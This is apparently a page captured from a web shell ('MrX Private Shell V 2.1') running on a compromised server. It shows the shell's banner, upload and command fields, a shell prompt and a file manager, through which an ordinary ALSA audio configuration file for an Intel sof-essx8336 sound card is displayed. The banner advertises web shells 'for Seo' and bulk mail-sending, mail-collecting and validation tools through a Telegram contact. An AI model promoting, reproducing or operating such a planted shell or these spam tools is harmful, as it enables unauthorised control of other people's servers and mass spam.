__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
Syntax 6

BootSequence [
	# Setup muxes / switches
	cset "name='Left Headphone Mixer Left DAC Switch' on"
	cset "name='Right Headphone Mixer Right DAC Switch' on"
	# Set digital mix mux to "dmic disable"
	# That doesn't affect dmic, but other values mute headset mic
	cset "name='Digital Mic Mux' 0"

	# Set HP vol to 0 dB
	cset "name='Headphone Playback Volume' 100%"
	cset "name='Headphone Mixer Volume' 100%"

	# Set DAC vol
	cset "name='DAC Playback Volume' 60%"
	# LDATA TO LDAC, RDATA TO RDAC
	cset "name='DAC Source Mux' 0"

	# Disable Auto Level Control
	cset "name='ALC Capture Switch' off"

	# Set capture vol
	cset "name='ADC Capture Volume' 60%"
]

Define.DeviceDmic ""

If.devdmic {
	Condition {
		Type String
		Haystack "${CardComponents}"
		Needle "cfg-dmics:"
	}
	True.Define.DeviceDmic "Mic"
}

SectionUseCase."HiFi" {
	File "/Intel/sof-essx8336/HiFi.conf"
	Comment "Play and record HiFi quality Music"
}
If.dmic {
	Condition {
		Type String
		Empty "${var:DeviceDmic}"
	}
	False.If.Dmic0 {
		Condition {
			Type ControlExists
			Control "name='Dmic0 Capture Volume'"
		}
		True.BootSequence [
			cset "name='Dmic0 Capture Volume' 70%"
		]
	}
}


Filemanager

Name Type Size Permission Actions
Hdmi.conf File 413 B 0644
HiFi.conf File 2.56 KB 0644
sof-essx8336.conf File 1.14 KB 0644
Filemanager